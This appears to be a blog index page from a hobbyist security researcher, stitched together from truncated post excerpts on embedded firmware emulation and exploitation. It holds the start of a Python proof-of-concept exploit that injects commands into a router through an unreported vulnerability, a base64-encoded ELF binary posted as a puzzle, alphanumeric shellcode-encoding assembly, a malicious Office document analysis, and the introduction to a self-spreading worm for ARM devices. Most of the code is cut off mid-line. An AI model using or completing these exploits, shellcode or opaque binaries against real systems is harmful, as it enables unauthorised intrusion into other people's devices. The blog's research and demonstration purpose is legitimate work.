Aaron's engineering blog

So I needed to put together a live demonstration for a presentation I'm doing soon on the attack surface of embedded devices, and why the industry seems to want their devices vulnerable. I have never needed to boot a firmware image in such a controlled manner before, and decided this would be something nice to share with others so they can just get this kind of thing up and running without hassle for their warped projects. So without further ado, lets get started. Before you set this up, you will need to set up a basic virtual machine with the GNU/Linux distribution of your choice. You will also need to have already extracted the firmware image into a folder called squashfs-root unless you want to do the smart thing, and apply these instructions to your own personal setup. First open the /etc/inittab for your firmware image. locate the line for sysinit and take note of what it has there. ::sysinit:/etc/rcS ::respawn:/sbin/getty 115200 ttyS1 ::respawn:/bin/sh ::restart:/sbin/init

The following is a simple router exploit POC for giggles, based on the following vulnerability . It would appear this doesn't even have a CVE, nor has the manufacturer been notified. I will be notifying the manufacturer and will also be writing another worm POC based on this exploit lol. #!/usr/bin/env python # ------------------------------------------------------------------------------ # THE SCOTCH-WARE LICENSE (Revision 43): # < aaronryool@gmail.com > wrote this file. As long as you retain this notice you # can do whatever you want with this stuff. If we meet some day, and you think # this stuff is worth it, you can buy me a shot of scotch in return # ------------------------------------------------------------------------------ import socket , sys , urllib if len ( sys . argv ) < 2 : print ( "Usage: %s <ip> <command string>... \x 1b[0m" % sys . argv [ 0 ] ) exit ( 1 ) commandstr = urllib . quote_plus ( " &quo

Below is a challenge, figure it out lol. Email answers to: aaronryool@gmail.com for shout outs f0VMRki7Z4lotpbWTn/DAAIAPgABAAAAQIAECAAAAADyAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAAB AAAAAAAAAFhIg/gCfDFYWGhQgAQI67RIuUiLCEgx2cMAUUi5LRSQkJCQkJBRSLlIuiDmB9Lao1H/ 1Egx0XQ4aIQAAAC6YOb/3Lhldm9MSMHgIEg1ZXRhSDQPW0g1AAA5R0jB4iCA6zxIMdAw3EiJBQAA AABIMcBqAWoBWF9IjTQlxYAECGotWg8F67NZQVkhISEgVGhhdCB0aGluZyB5b3UgZGlkLCB0ZWxs IG1lIGFib3V0IGl0LgoBAAAABwAAAAAAAAAAAAAAAIAECAAAAAAAgAQIAAAAACoBAAAAAAAAKgEA AAAAAAAAEAAAAAAAAA==

So a new friend of mine told me he wanted help extracting the shellcode and payloads from a doc file, I had never analyzed a doc file before so I just HAD to say yes after informing him that I hadn't done analysis of this particular attack vector before. In the end he said he would buy me a pizza if i could pull this off. It turns out, this evil thing is a copy cat of an existing piece of malware, find information here and its the evil version of that lol. so this made my analysis easier, especially since i have never analyzed office documents before in my LIFE. So far I can confirm that this uses at least some of the same exploits, and I feel safe to conject that it is just an obfuscated re-packaging of the original malware concept. This version also appears to be somewhat smaller in size as well. In part two I hope to do further analysis to find the signature of the egg, and decrypt the second stage shellcode. I will also plan on doing a more in depth closing analy

So i had a funny idea, and decided to do this : code is pushed onto the stack in reverse order , and the pieces have to be put on in little endian so everything comes out right : i padded everything with nops as well [ bits 64 ] section . text global _start org 0x08048000 ehdr: ; Elf64_Ehdr db 0x7F , " ELF " , 2 , 1 , 1 , 0 ; e_ident times 8 db 0 dw 2 ; e_type dw 62 ; e_machine dd 1 ; e_version dq _start ; e_entry dq phdr - $$ ; e_phoff dq 0 ; e_shoff dd 0 ; e_flags dw ehdrsize ; e_ehsize dw phdrsize ; e_phentsize dw 1 ; e_phnum dw 0 ; e_shentsize dw 0

A simple example to show you how you can run encoded non printable things like syscall on the stack with magic and stuff. this turns into: "hNDqqTXP, PYhAAAAX1A jNX4r" [ bits 64 ] _start : push 0x7171444e ; store our code in little endian push rsp ; return pointer pop rax push rax sub al , 32 ; needed to make xor printable code, this will fail on rare occassion when the value is less than 32 push rax ; copy rax into rcx pop rcx push 0x41414141 ; syscall code block key pop rax xor [rcx+ 32 ] , eax ; decode the sycall code block using an offset for more ass pulling push 0x4e ; encoded syscall number for exit pop rax xor al , 0x72 ; xor it with the key ret ; this is removed when turned into shellcode ; printable: 0x20 - 0x7e ; alphanum: 0x30 - 0x39, 0x41 - 0x5A, 0x61 - 0x7A ; CODE | ASCII | HEX ;________________________|____

So a friend of mine was having trouble doing syscalls in his exploration of alphanumeric shellcode, and I thought i would lend him a hand :D enjoy. this all turns into: "h0ppoXH50p0o4nPYhAAAAX1A0jNX4rNDqq" you will need to replace the absolute address magic with your own to have this run :P [ bits 64 ] _start : ; printable: 0x20 - 0x7e ; alphanum: 0x30 - 0x39, 0x41 - 0x5A, 0x61 - 0x7A ; CODE | ASCII | HEX ;________________________|________|_________________________ ; and rax, 0x7a7a7a7a ; H%zzzz | 0x48,0x25,0x7a,0x7a,0x7a,0x7a ; and eax, 0x7a7a7a7a ; %zzzz | 0x25,0x7a,0x7a,0x7a,0x7a ; and ax, 0x7a7a ; f%zz | 0x66,0x25,0x7a,0x7a ; and al, 0x7a ; $z | 0x24,0x7a ; sub rax, 0x7a7a7a7a ; H-zzzz | 0x48,0x2d,0x7a,0x7a,0x7a,0x7a ; sub eax, 0x7a7a7a7a ; -zzzz | 0x2d,0x7a,0x7a,0x7a,0x7a ; sub ax, 0x7a7a ; f-zz | 0x66,0x2d,0x7a,0x7a ; sub al, 0x7a ; ,z | 0x2c,0x7a ; xor rax, 0x7a7a7a7a

This is the non-obfuscated code for the live demonstration worm for a talk I plan to do on the vulnerability of embedded ARM devices. This is a prime example of industry laziness. Have fun :D I am in no way responsible for any use, or damage caused by the use of this code. If you are somehow able to modify this to do harm of any kind, you have modified it enough to be held responsible for your actions. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ THE SCOTCH - WARE LICENSE ( Revision 0 ) : @ aaronryool @gmail . com wrote this file . As long as you retain this notice you @ can do whatever you want with this stuff . If we meet some day , and you think @ this stuff is worth it , you can buy me a shot of scotch in return @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @